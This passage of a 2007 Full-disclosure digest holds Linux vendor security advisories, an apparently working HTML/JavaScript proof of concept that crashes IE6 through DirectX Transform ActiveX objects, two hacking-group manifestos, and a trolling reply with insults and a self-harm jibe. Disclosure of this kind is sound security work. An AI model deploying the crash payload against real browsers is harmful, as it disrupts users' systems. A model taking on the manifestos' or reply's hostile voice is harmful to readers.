php5-soap=conary.rpath.com@rpl:1/5.2.5-1-1 php5-xsl=conary.rpath.com@rpl:1/5.2.5-1-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-1943 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900 Description: Previous versions of the php5 package contain multiple vulnerabilities, the most serious of which involve several Denial of Service attacks (application crashes and temporary application hangs). It is not currently known that these vulnerabilities can be exploited to
execute malicious code. In its default configuration, rPath Linux 1 does not install php5 and is thus not vulnerable; however, systems upon which php5 and an exposed application have been installed may be vulnerable. http://wiki.rpath.com/Advisories:rPSA-2007-0242 Copyright 2007 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit- license.html ------------------------------ Message: 7 Date: Mon, 19 Nov 2007 17:30:32 -0500 (GMT-05:00) From: Elazar Broad <elazarb () earthlink net> Subject: [Full-disclosure] Multiple stack-based buffer overflows in dxmsft.dll To: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk> Message-ID: <30247048.1195511432439.JavaMail.root@elwamui- norfolk.atl.sa.earthlink.net> Content-Type: text/plain; charset=UTF-8 There are multiple stack overflows in dxmsft.dll version 6.3.2900.3199(Image DirectX Transforms). This DLL exposes DirectX Image Transform objects which are safe for scripting. The issue is
with the Color property of certain objects, so I am assuming this property is inherited from a base interface. This affects WindowsXP SP2 IE6(fully patched), I have not tested this on IE7 and it does not appear to affect Windows Server 2003 R2 SP2(newer version of the dxmsft.dll). I have not tested code execution, though it may be possible. I received the following response from Microsoft: ---From our investigation this issue was found to be a stabilityproblem which is not exploitable. The net effect of this issue is that IE will become unresponsive. The underlying operating system will still respond and Killing the process will stop the local DoS. --- It did not hang IE on my machine, but instead crashed IE with a stack overflow. This may be related to http://www.securityfocus.com/bid/19029/. PoC as follows: --------------------- <!-- written by e.b. --> <html> <head> <script language="JavaScript" DEFER> function Check() { var s = "AAAA"; while (s.length < 999999) s=s+s; var obj = new ActiveXObject("DXImageTransform.Microsoft.Chroma"); obj.color = s; var obj = new ActiveXObject("DXImageTransform.Microsoft.DropShadow"); obj.color = s; var obj = new ActiveXObject("DXImageTransform.Microsoft.Glow"); obj.color = s; var obj = new ActiveXObject("DXImageTransform.Microsoft.MaskFilter"); obj.color = s; var obj = new ActiveXObject("DXImageTransform.Microsoft.Shadow"); obj.color = s; } </script> </head> <body onload="JavaScript: return Check();" /> </html> --------------------- Elazar ------------------------------ Message: 8 Date: Mon, 19 Nov 2007 19:12:41 -0700 From: security () mandriva com Subject: [Full-disclosure] [ MDKSA-2007:227 ] - Updated poppler packages fix vulnerabilities To: full-disclosure () lists grok org uk Message-ID: <E1IuIbR-0008H5-79 () artemis annvix ca> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
__________________________________________________________________
_____ Mandriva Linux Security Advisory MDKSA- 2007:227 http://www.mandriva.com/security/
__________________________________________________________________
_____ Package : poppler Date : November 19, 2007 Affected: 2007.1, 2008.0, Corporate 4.0
__________________________________________________________________
_____ Problem Description: Alin Rad Pop found several flaws in how PDF files are handled in poppler. An attacker could create a malicious PDF file that would cause poppler to crash or potentially execute arbitrary code when opened. The updated packages have been patched to correct this issue.
__________________________________________________________________
_____ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
__________________________________________________________________
_____ Updated Packages: Mandriva Linux 2007.1: 9f040875778bb940669bd2bfdbef248c 2007.1/i586/libpoppler-qt1- 0.5.4-3.3mdv2007.1.i586.rpm 804046d0a838cb3a0a5e355fb118b1bc 2007.1/i586/libpoppler-qt1- devel-0.5.4-3.3mdv2007.1.i586.rpm dd83d0b61f2ad91ea79f314752a0f514 2007.1/i586/libpoppler-qt4-1- 0.5.4-3.3mdv2007.1.i586.rpm 05d0deb14ec5dad80d8d400756b3d183 2007.1/i586/libpoppler-qt4-1- devel-0.5.4-3.3mdv2007.1.i586.rpm a23fb37129c8756e353fe47be6d6a8be 2007.1/i586/libpoppler1-0.5.4- 3.3mdv2007.1.i586.rpm 6db198b349d7ebe355d809732ddb21bb 2007.1/i586/libpoppler1-devel- 0.5.4-3.3mdv2007.1.i586.rpm 3e280873492799bebdec28872351052e 2007.1/i586/poppler-0.5.4- 3.3mdv2007.1.i586.rpm 40600d9ccb1e7f7a76cb4ccf447e9e40 2007.1/SRPMS/poppler-0.5.4- 3.3mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: b49094eb08c809397081d357f7251166 2007.1/x86_64/lib64poppler-qt1- 0.5.4-3.3mdv2007.1.x86_64.rpm e6f52d8bb5d9f84458ae6892cd7800da 2007.1/x86_64/lib64poppler-qt1- devel-0.5.4-3.3mdv2007.1.x86_64.rpm 4d08d7343c94a016928cef93490af098 2007.1/x86_64/lib64poppler-qt4- 1-0.5.4-3.3mdv2007.1.x86_64.rpm b0f8d4b4c5f1917c61687900a119e685 2007.1/x86_64/lib64poppler-qt4- 1-devel-0.5.4-3.3mdv2007.1.x86_64.rpm 0955492bd1319fdc2e74c2528994e2bc 2007.1/x86_64/lib64poppler1- 0.5.4-3.3mdv2007.1.x86_64.rpm f918b50ec88a2aca954c156c33c605e8 2007.1/x86_64/lib64poppler1- devel-0.5.4-3.3mdv2007.1.x86_64.rpm 24fdcc57f5c7481e6732f45e43e49d51 2007.1/x86_64/poppler-0.5.4- 3.3mdv2007.1.x86_64.rpm 40600d9ccb1e7f7a76cb4ccf447e9e40 2007.1/SRPMS/poppler-0.5.4- 3.3mdv2007.1.src.rpm Mandriva Linux 2008.0: 840730bb310636d43a3d07a6d4d4f281 2008.0/i586/libpoppler-devel- 0.6-3.1mdv2008.0.i586.rpm 9d6109683ae8729ad549c56d2f8998c1 2008.0/i586/libpoppler-glib- devel-0.6-3.1mdv2008.0.i586.rpm b69e7e912fe2f532c5a9ed7c3687eb42 2008.0/i586/libpoppler-glib2- 0.6-3.1mdv2008.0.i586.rpm cea89e4b36cbe99060e3568038474078 2008.0/i586/libpoppler-qt-devel-
0.6-3.1mdv2008.0.i586.rpm 64a459904bf417570e4f2b8e0d550c77 2008.0/i586/libpoppler-qt2-0.6- 3.1mdv2008.0.i586.rpm 5d1c9970275811b934599f95b5264d7d 2008.0/i586/libpoppler-qt4-2- 0.6-3.1mdv2008.0.i586.rpm 7bbfdb4209d40f503bedc8e10e4687df 2008.0/i586/libpoppler-qt4- devel-0.6-3.1mdv2008.0.i586.rpm 812e34a9b25b4e28169bf84804da8325 2008.0/i586/libpoppler2-0.6- 3.1mdv2008.0.i586.rpm 57380d8dcef7e2b404ed6a7571969bfe 2008.0/i586/poppler-0.6- 3.1mdv2008.0.i586.rpm 697118d63ace272626e64555f7b8cffd 2008.0/SRPMS/poppler-0.6- 3.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: f64a05a64b742ac4a40a07b8c43b9545 2008.0/x86_64/lib64poppler- devel-0.6-3.1mdv2008.0.x86_64.rpm 5d9963749a1315a570e9a70783c078da 2008.0/x86_64/lib64poppler-glib-
devel-0.6-3.1mdv2008.0.x86_64.rpm 8d62d129c9279da1ed306a02785d5a7f 2008.0/x86_64/lib64poppler- glib2-0.6-3.1mdv2008.0.x86_64.rpm f844c25e098d3b295cba161a07795b36 2008.0/x86_64/lib64poppler-qt- devel-0.6-3.1mdv2008.0.x86_64.rpm 5bfdd34b678a33aeebeec9dc7b0d0dd7 2008.0/x86_64/lib64poppler-qt2- 0.6-3.1mdv2008.0.x86_64.rpm 83334372f43c893ca9afdaefdd7b90d0 2008.0/x86_64/lib64poppler-qt4- 2-0.6-3.1mdv2008.0.x86_64.rpm 82099121bfc50561cb3a175d9d31152b 2008.0/x86_64/lib64poppler-qt4- devel-0.6-3.1mdv2008.0.x86_64.rpm 59a614072521db19cd3b502e6d49959a 2008.0/x86_64/lib64poppler2-0.6-
3.1mdv2008.0.x86_64.rpm 0a5a8795e93dc014c5f07e2ab6e73393 2008.0/x86_64/poppler-0.6- 3.1mdv2008.0.x86_64.rpm 697118d63ace272626e64555f7b8cffd 2008.0/SRPMS/poppler-0.6- 3.1mdv2008.0.src.rpm Corporate 4.0: 86be8a80003ab4c7a36905eac276dbf6 corporate/4.0/i586/libpoppler- qt0-0.4.1-3.6.20060mlcs4.i586.rpm 32bae8fecaa6ec4e2b1e7e68458f889b corporate/4.0/i586/libpoppler- qt0-devel-0.4.1-3.6.20060mlcs4.i586.rpm e9aefa230a3c897361330d91583eb4b9 corporate/4.0/i586/libpoppler0- 0.4.1-3.6.20060mlcs4.i586.rpm 280a9f7aea1b3766864996d5969e69ea corporate/4.0/i586/libpoppler0- devel-0.4.1-3.6.20060mlcs4.i586.rpm aab471f88ae46303acfef45c3464bce6 corporate/4.0/SRPMS/poppler- 0.4.1-3.6.20060mlcs4.src.rpm Corporate 4.0/X86_64: 62f84dc6ac78997484c76c0e34c74063 corporate/4.0/x86_64/lib64poppler-qt0-0.4.1- 3.6.20060mlcs4.x86_64.rpm 5fda381aed07c4eaa47f48d7187449ee corporate/4.0/x86_64/lib64poppler-qt0-devel-0.4.1- 3.6.20060mlcs4.x86_64.rpm 6abf5b15ba6ffa847dde37a2d0f049d0 corporate/4.0/x86_64/lib64poppler0-0.4.1-3.6.20060mlcs4.x86_64.rpm bcbad9d141f0b9615740d5f027a24699 corporate/4.0/x86_64/lib64poppler0-devel-0.4.1- 3.6.20060mlcs4.x86_64.rpm aab471f88ae46303acfef45c3464bce6 corporate/4.0/SRPMS/poppler- 0.4.1-3.6.20060mlcs4.src.rpm
__________________________________________________________________
_____ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain
the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com
__________________________________________________________________
_____ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHQhenmqjQ0CJFipgRAl9SAJ9gU0uhZwFvHZ9tF4z8F15VUgUfNwCgjOhN XrZ88C4TwK/FkZL+zC+zOLU= =ehqr -----END PGP SIGNATURE----- ------------------------------ Message: 9 Date: Mon, 19 Nov 2007 19:23:22 -0700 From: security () mandriva com Subject: [Full-disclosure] [ MDKSA-2007:228 ] - Updated cups packages fix vulnerabilities To: full-disclosure () lists grok org uk Message-ID: <E1IuIlm-0008OR-55 () artemis annvix ca> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
__________________________________________________________________
_____ Mandriva Linux Security Advisory MDKSA- 2007:228 http://www.mandriva.com/security/
__________________________________________________________________
_____ Package : cups Date : November 19, 2007 Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
__________________________________________________________________
_____ Problem Description: Alin Rad Pop found several flaws in how PDF files are handled in cups. An attacker could create a malicious PDF file that would cause cups to crash or potentially execute arbitrary code when opened. The updated packages have been patched to correct this issue.
__________________________________________________________________
_____ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393
__________________________________________________________________
_____ Updated Packages: Mandriva Linux 2007.0: 4fd4b6a2d384e2cc599b415131a58edd 2007.0/i586/cups-1.2.4- 1.5mdv2007.0.i586.rpm 29fd652c383d4ea688336bc143f1e5cf 2007.0/i586/cups-common-1.2.4- 1.5mdv2007.0.i586.rpm 6a6c275bf900887bc34325ef552f39ab 2007.0/i586/cups-serial-1.2.4- 1.5mdv2007.0.i586.rpm b2f487a129a0ae8cefd66bd89177f5bd 2007.0/i586/libcups2-1.2.4- 1.5mdv2007.0.i586.rpm 853850aadbfed2e7a5fe76ddfd293990 2007.0/i586/libcups2-devel- 1.2.4-1.5mdv2007.0.i586.rpm cdeaa28956923402a8986821fb01ec53 2007.0/i586/php-cups-1.2.4- 1.5mdv2007.0.i586.rpm 5152934e9233e36bd1308d36144bbc1c 2007.0/SRPMS/cups-1.2.4- 1.5mdv2007.0.src.rpm Mandriva Linux 2007.0/X86_64: 7df3b74de7c7d06ca7e750912993b85a 2007.0/x86_64/cups-1.2.4- 1.5mdv2007.0.x86_64.rpm 7c8463926c7a618df34b5e31ddb3b80f 2007.0/x86_64/cups-common-1.2.4-
1.5mdv2007.0.x86_64.rpm 49b51564f1e7ce0df1da99f7f86bff3c 2007.0/x86_64/cups-serial-1.2.4-
1.5mdv2007.0.x86_64.rpm e6c50f4ec69f14569036549ee1402beb 2007.0/x86_64/lib64cups2-1.2.4- 1.5mdv2007.0.x86_64.rpm 0d4f42989dc3604a551cf1f9f4bb1c76 2007.0/x86_64/lib64cups2-devel- 1.2.4-1.5mdv2007.0.x86_64.rpm 8a9a47b66a117d76b6612ac247ee76fb 2007.0/x86_64/php-cups-1.2.4- 1.5mdv2007.0.x86_64.rpm 5152934e9233e36bd1308d36144bbc1c 2007.0/SRPMS/cups-1.2.4- 1.5mdv2007.0.src.rpm Mandriva Linux 2007.1: 8bca1f69b483c9907b164d090bf71161 2007.1/i586/cups-1.2.10- 2.3mdv2007.1.i586.rpm 8d84223e130eb9039dd5e25dfcf47684 2007.1/i586/cups-common-1.2.10- 2.3mdv2007.1.i586.rpm c73459d19f605e2093fe8e7753510cf8 2007.1/i586/cups-serial-1.2.10- 2.3mdv2007.1.i586.rpm 9f4e634eb3e900ffefd59562780a3f28 2007.1/i586/libcups2-1.2.10- 2.3mdv2007.1.i586.rpm fd0883a8e8243ff1ceb862f14b9f032b 2007.1/i586/libcups2-devel- 1.2.10-2.3mdv2007.1.i586.rpm bbb9b69f0e77c2e89f82328fa96a254f 2007.1/i586/php-cups-1.2.10- 2.3mdv2007.1.i586.rpm a9694fcccc09b5fc3e0ab17acff8c857 2007.1/SRPMS/cups-1.2.10- 2.3mdv2007.1.src.rpm Mandriva Linux 2007.1/X86_64: b1ae2a278de78e5e90cd818af06c8869 2007.1/x86_64/cups-1.2.10- 2.3mdv2007.1.x86_64.rpm feb3659cf805bbb8d7d528ec00007416 2007.1/x86_64/cups-common- 1.2.10-2.3mdv2007.1.x86_64.rpm f10bf7760a46b9bf195d0ee2f0b20ad0 2007.1/x86_64/cups-serial- 1.2.10-2.3mdv2007.1.x86_64.rpm 7dccd2d2bd22194c72821a2315be71f0 2007.1/x86_64/lib64cups2-1.2.10-
2.3mdv2007.1.x86_64.rpm 1690756e08eed05d08b9b1dad4554a69 2007.1/x86_64/lib64cups2-devel- 1.2.10-2.3mdv2007.1.x86_64.rpm 9d0f9f960a4e171d5b69a51650a0e97c 2007.1/x86_64/php-cups-1.2.10- 2.3mdv2007.1.x86_64.rpm a9694fcccc09b5fc3e0ab17acff8c857 2007.1/SRPMS/cups-1.2.10- 2.3mdv2007.1.src.rpm Mandriva Linux 2008.0: fb82aaf844538f1192dc5a5bba48ebb2 2008.0/i586/cups-1.3.0- 3.3mdv2008.0.i586.rpm 0f32262c9fd557a33653d346cf561eb0 2008.0/i586/cups-common-1.3.0- 3.3mdv2008.0.i586.rpm 679603be0ff46880b67a8a526fc5e0f6 2008.0/i586/cups-serial-1.3.0- 3.3mdv2008.0.i586.rpm 2c475b6dbc51abb97f4978fb38f805aa 2008.0/i586/libcups2-1.3.0- 3.3mdv2008.0.i586.rpm c8bfa0b793dc2f75c15f19e4822bb02d 2008.0/i586/libcups2-devel- 1.3.0-3.3mdv2008.0.i586.rpm 002037d0c0296df0f488b6827abd3621 2008.0/i586/php-cups-1.3.0- 3.3mdv2008.0.i586.rpm 81a92819ff1b95379e68d0b92022ef31 2008.0/SRPMS/cups-1.3.0- 3.3mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 908ceb359b83acc57734a535e1b7b7a5 2008.0/x86_64/cups-1.3.0- 3.3mdv2008.0.x86_64.rpm 3ef9fbbffa74d7ea35ec501c074f6195 2008.0/x86_64/cups-common-1.3.0-
3.3mdv2008.0.x86_64.rpm b29c75dd2616451c33800772d77f6d22 2008.0/x86_64/cups-serial-1.3.0-
3.3mdv2008.0.x86_64.rpm 7bc26d62f62bebfd13f748a3e1c92f40 2008.0/x86_64/lib64cups2-1.3.0- 3.3mdv2008.0.x86_64.rpm bd7fca05e68b64f71532007f0d3336b6 2008.0/x86_64/lib64cups2-devel- 1.3.0-3.3mdv2008.0.x86_64.rpm f8a5c7b8727652c48080c7d42ebbbb98 2008.0/x86_64/php-cups-1.3.0- 3.3mdv2008.0.x86_64.rpm 81a92819ff1b95379e68d0b92022ef31 2008.0/SRPMS/cups-1.3.0- 3.3mdv2008.0.src.rpm Corporate 3.0: d8f8b23034ed04134c3adffe8900c3c0 corporate/3.0/i586/cups-1.1.20- 5.14.C30mdk.i586.rpm 692d4cc10f27d0b032414bd49047a0d5 corporate/3.0/i586/cups-common- 1.1.20-5.14.C30mdk.i586.rpm f51f15805a46410360a735d266b05513 corporate/3.0/i586/cups-serial- 1.1.20-5.14.C30mdk.i586.rpm ac8c8341c807fe425b95b2d36e540632 corporate/3.0/i586/libcups2- 1.1.20-5.14.C30mdk.i586.rpm 9e4381efa99b4259291d83ce12fbbfd1 corporate/3.0/i586/libcups2- devel-1.1.20-5.14.C30mdk.i586.rpm dbb2486013936d7ac79996b437871851 corporate/3.0/SRPMS/cups-1.1.20-
5.14.C30mdk.src.rpm Corporate 3.0/X86_64: af60c4b209e2d7c8b2926152484d7a16 corporate/3.0/x86_64/cups- 1.1.20-5.14.C30mdk.x86_64.rpm 04723ab4e6928c7c94509970ee3affe5 corporate/3.0/x86_64/cups- common-1.1.20-5.14.C30mdk.x86_64.rpm 633e04aa6a1a94e4c16ff06b80c5b0a1 corporate/3.0/x86_64/cups- serial-1.1.20-5.14.C30mdk.x86_64.rpm 8455649b95bd3ccbbbd83643355d0d9d corporate/3.0/x86_64/lib64cups2-
1.1.20-5.14.C30mdk.x86_64.rpm b0bb5f82abe5e63f2330a2ce3856d9fd corporate/3.0/x86_64/lib64cups2-
devel-1.1.20-5.14.C30mdk.x86_64.rpm dbb2486013936d7ac79996b437871851 corporate/3.0/SRPMS/cups-1.1.20-
5.14.C30mdk.src.rpm Corporate 4.0: 601bc4824031861920955ad8555aa4d7 corporate/4.0/i586/cups-1.2.4- 0.5.20060mlcs4.i586.rpm 47167ce1b770bf583616d86a06e4b434 corporate/4.0/i586/cups-common- 1.2.4-0.5.20060mlcs4.i586.rpm 8b12a32bd46ce350143b1722dbf76de2 corporate/4.0/i586/cups-serial- 1.2.4-0.5.20060mlcs4.i586.rpm 7bded05fbaf5b485aef109404f0132f9 corporate/4.0/i586/libcups2- 1.2.4-0.5.20060mlcs4.i586.rpm 09c2660b9004454c07b15d3e57124acc corporate/4.0/i586/libcups2- devel-1.2.4-0.5.20060mlcs4.i586.rpm 55eddc1759513c131465e61564977618 corporate/4.0/i586/php-cups- 1.2.4-0.5.20060mlcs4.i586.rpm 3a2b57f8a67c419bc74f09db58b6e789 corporate/4.0/SRPMS/cups-1.2.4- 0.5.20060mlcs4.src.rpm Corporate 4.0/X86_64: 1e3565148aa5da08a4b999b42d7763c8 corporate/4.0/x86_64/cups-1.2.4-
0.5.20060mlcs4.x86_64.rpm a1da7ffbc6fb5294967fde1b785dc7fa corporate/4.0/x86_64/cups- common-1.2.4-0.5.20060mlcs4.x86_64.rpm 306ffbfbf7606ffc31c197f77c539eef corporate/4.0/x86_64/cups- serial-1.2.4-0.5.20060mlcs4.x86_64.rpm f0364ad9115ceb82978847ab6cdc66e1 corporate/4.0/x86_64/lib64cups2-
1.2.4-0.5.20060mlcs4.x86_64.rpm d93d6cb48d60436c9f1b32181f82b6c7 corporate/4.0/x86_64/lib64cups2-
devel-1.2.4-0.5.20060mlcs4.x86_64.rpm 802a3f4c3167f06640d2a8c3394cb26c corporate/4.0/x86_64/php-cups- 1.2.4-0.5.20060mlcs4.x86_64.rpm 3a2b57f8a67c419bc74f09db58b6e789 corporate/4.0/SRPMS/cups-1.2.4- 0.5.20060mlcs4.src.rpm
__________________________________________________________________
_____ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain
the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com
__________________________________________________________________
_____ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team <security*mandriva.com> -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.7 (GNU/Linux) iD8DBQFHQhlDmqjQ0CJFipgRAs6VAJ0Z1CEZIWu9sWiiexjGtC+JUXXXMACgo44W z5jyh/u/+4QFVsSocymKj/g= =RkrY -----END PGP SIGNATURE----- ------------------------------ Message: 10 Date: Tue, 20 Nov 2007 07:09:46 +0100 From: rchrafe <rchrafe () gmail com> Subject: [Full-disclosure] Tha Manual. To: full-disclosure () lists grok org uk Message-ID: <47427A2A.5060905 () gmail com> Content-Type: text/plain; charset=windows-1252; format=flowed Tha manual. We do not care about you, or your affilates. We are in position, and a new army has emerged. The first of a set of manuals, being provided as follows shall be provided wherein those who maintain an interest in the power of the simplicity of man. The Manual Written by d4rk1v4n, part of the rchrafe crime wave. Notes: We are the rchrafe, you are pathetic You must learn assembly. It must be the breakpoint for any other language, high-level or low-level and integral learning processes. It will be assumed that a thorough course in C Programming and Assembly must first commence. Also after which a basic, yet thourough understanding of Logic Gates, which will be provided as articles following the manual. This guide is a perfected manual, crisp with only the intent to create an army of elite. Simply to intervene. Mod 1: Kernel Design { Operating System Concepts Chapters 1-3 5-13 Linux Kernel 2.4 Chapters 1-13 Shellcode Stack Overflows Format string exploitation Integer Overflows Race Conditions (files) Kernel Exploitation (Linux) Kernel patching (Linux) Kernel rootkit (Linux) linux process patching dlmalloc exploitation (partial analysis of 6 thousand line src) raw sockets, hping2 i/o multiplexing pthreads ELF executable format OS Fingerprinting IRC Protocol RFC SMTP Protocol ICMP Protocol POP3 protocol } Mod 2: Algorithms & Data Structures { Computer Organization Hardware/Software Int. chapters 1-6 FreeBSD Design And Implementation chapters 1-6, 8, 12, 13 Algorithms And Data structures (Sedgwick, knuth, whale) Linux TCPIP Implementation Linux Synchronization analysis Linux ext3 analysis Linux kmalloc analysis Threads Mandatory Access Control Models (Selinux,grsec,trustedbsd, dod85) Role Based Access Control (rsbac for linux) Buffer overflow Protection MIPS ASM Computer Networks - Tanenbaum C++ (full) Perl phkmalloc exploitation advanced dlmalloc exploitation advanced fmt string exploitation advanced race conditions (double free, etc) freebsd kernel exploitation freebsd kernel rootkit cisco protocols (IGRP, EIGRP, BGP, OSPF, IS-IS) TCP RFC IP RFC IPSEC RFC DNS specification HTTP specification IMAP specification SSL 3 specification Kerberos asynch i/o perl exploitation php exploitation sql injection win32 API PE executable format windows ring 3 hacks IDA/Softice work binary encryption polymorphic shellcode WIN DCOM ONE RPC Specification } Mod 3: Large source analysis { 400-500 Thousand lines of src analysis Solaris Kernel internals book Sparc ASM windows kernel analysis & exploitation Prolog Artificial Intelligence Compilers SIMD ISP Design Database Design ISBN: 0321204484 Sysvmalloc exploitation IOS malloc exploitation RTL malloc exploitation kmalloc exploitation ATM VPN?s DecNet Cryptography Linear algebra } Level 4: Parallelism, Distributiveness, Diversity { OpenVMS Scheduler ISBN: 1555581560 OpenVMS Memory Managment ISBN: 1555581595 Real Time Scheduling Design ISBN: 0387231374 HP-UX Kernel internals ISBN: 0130328618 Distributed Operating Systems ISBN: 0132199084 VHDL ISBN: 0471899720 Verilog Designing a MAC Model (like selinux) Designing BOF Protection (like PAX) Parallel Architectures Parallel Algorithm Design Advanced Artificial Intelligence Alpha PowerPC PA-RISC ARM M68K OpenVMS using HP-UX using Digital Image Processing Digital Signal Processing Electrical Engineering Basics Circuit Board Design } The rchrafe will resume tutorials of the Mod 1 on the 1st of December 2007, in the channel #crx under irc.efnet.org/pl/ru We will not accommodate stupidity. The key will be revealed on rchrafe.wordpress.com at midnight, the
1st of december 2007 for all to join! Well will rise! ------------------------------ Message: 11 Date: Tue, 20 Nov 2007 07:13:02 +0100 From: rchrafe <rchrafe () gmail com> Subject: [Full-disclosure] The Call to Reason To: full-disclosure () lists grok org uk Message-ID: <47427AEE.2060404 () gmail com> Content-Type: text/plain; charset=windows-1252; format=flowed ?The Call to Reason.? By the rhcrafe Senior seat of officials. BEHOLD AND WITNESS, those who read this document, this which is the official PROCLAMATION and LETTER OF INTENT concerning the future of RCHRAFE and RCHRAFE member states; the words within are no less than the movement of RCHRAFE from its widely admired position in the computer underground to an overt existence as a world renowned hacking into computer machines authority. REGARDING the current social state of hacking into computer machines, RCHRAFE takes no stance. As an autonomous body with goals unrelated to what is largely considered ?the hacking community?, RCHRAFE recognizes no entities nor social classes other than RCHRAFE and anti-RCHRAFE. Abstract concepts such as ?black hat? and ?white hat? do thus not exist in the lexicon of RCHRAFE politics, and are irrelevant to our goals. What then, are the goals and motivations of this powerful force that has developed over the years, that has come to be known as RCHRAFE? No less than the subjugation of power in the computer machine community. It is at this time appropriate to state COMMUNIQUE POINT NUMBER ONE: ?RCHRAFE DOES NOT AFFILIATE IN CONCEPT WITH ANY EXISTING POLITICAL OR SOCIAL ENTITIES. RCHRAFE IS IN AND OF ITSELF, A SOCIAL PHENOMENON OF ADEQUATE STATURE TO STAND WITHOUT ASSISTANCE OR AFFILIATION.? It should be pointed out that although RCHRAFE has strong ties to the American Republican Party and political republican ideology, we do not participate actively in government politics of any kind. PERTAINING TO the overall goals of RCHRAFE as an organization and the pervasive RCHRAFE social movement, we have distinct purpose and bearing. While RCHRAFE assimilates no political or social goals in and of themselves, we reserve the right to voice opinion when political or social policies or activities relate to these aforementioned goals. These goals, stated, comprise COMMUNIQUE POINT NUMBER TWO: ?RCHRAFE EXISTS ENTIRELY FOR THE ADVANCEMENT OF MEMBERS, MEMBER INTEREST, AND HAQING INTO COMPUTER MACHINES.? We may surmise in corollary then, by the combined observations of communique points one and two, that RCHRAFE is in definition a usurping entity, and will tend to remain benign concerning rival computer groups. TO CONCLUDE, RCHRAFE will exist as long as the interests of the corollaries are subject to external change. We reserve the right to maintain the status of RCHRAFE and the goals of the corollaries by any mean necessary, but never by exceeding necessary means. We Shall Rise! ------------------------------ Message: 12 Date: Tue, 20 Nov 2007 07:33:09 +0100 From: rchrafe <rchrafe () gmail com> Subject: Re: [Full-disclosure] How to become a Computer Security Professional ? To: worried security <worriedsecurity () googlemail com> Cc: full-disclosure () lists grok org uk Message-ID: <47427FA5.2090307 () gmail com> Content-Type: text/plain; charset=ISO-8859-1; format=flowed worried security wrote:On Nov 17, 2007 1:08 PM, Meef <massa () iut-dhaka edu> wrote:What are the steps to follow to become a computer securityprofessional ?,Sorry, you will never make it to professionalism as you brokethefirst and most important rule. NEVER POST ON A PUBLIC MAILING LIST!!!!And you are here because, you are 'worried security'.The second most important rule of becoming a securityprofessional is,if you do need to post to a public mailing list then never do it
undera .edu or .gov or official company e-mail address, we will alljustpoint and laugh and have your account hi-jacked with the next cross-site scripting flaw that gets to to the public mailinglist.But I thought the first most important rule, which was not to be broken, was not to post on a security mailing list, such as this. Kindly go through your cross-site request forgery techniques with me, I'm really in need of a m3nt0rThe third most important rule to becoming a securityprofessional isnever talk to people on public mailing lists who have brokenrule oneand rule two or take whats said on public mailing listsseriously. Assoon as you take what is said on a public mailing list seriously
isthe day you should cut your wrists.He's getting so horny right nowAlways get advice from a credible source after learning of athreat onthe public mailing lists.Like worried security? Please tell me if you think the linux/tcp stack is currently vulnerable. I have N0 1D34The forth most important rule to becoming a securityprofessional,always use a throw-away e-mail account so it doesn't matter ofscriptkids hi-jack your e-mail account with the next cross-sitescriptingvulnerablity that gets posted to the public mailing lists.HIJACK THIS BITCHThe fifth most important rule to becoming a securityprofessional isuse an alias on public mailing lists, never use your real name,placeof work, place of education, place of living, as backfirescannot bereversed. Once you've post something its post, archived aroundtheworld and translated into more languages than you can shake astickat.Y0u juzt m1ght be shirl0ck h0lm3zThe sixth most important rule to becoming a securityprofessional isbe paranoid. Yes, don't listen to people who say paranoia is bad
foryou. In this industry it pays to be paranoid. Forget about yourownwelfare, you've got millions of users and the economic stability
ofthe world to think about. Trade in your own life to save thelife ofothers. Indeed being a security professional will mean longhours, andsleepless nights. Be prepared to be woken up in the middle ofthenight and expect to have people shouting for answers down thephone toyou or rush you into the security operations center when news of
amajor data breach reaches the inbox of your security team."Be prepared to be woken up in the middle of the night and expect to have people shouting for answers down the phone to you or rush you into the security operations center when news of a major data breach reaches the inbox of your security team." This is what a professional at computer security undergoes? I thought I could just, be in my bedroom reading about aix security enhancements and win32 buffer overflow prevention methodsThe seventh most important rule to becoming a securityprofessional.Think for yourself don't post ridiculous questions to a publicmailinglist and expect to get the right answer, most folks will makeanythingup and people generally cannot be trusted. Use search engines,readbooks and free your mind from what other security researchersaredoing. Don't duplicate, originate your own work.He talks a whole lot about mailing listsThe eighth 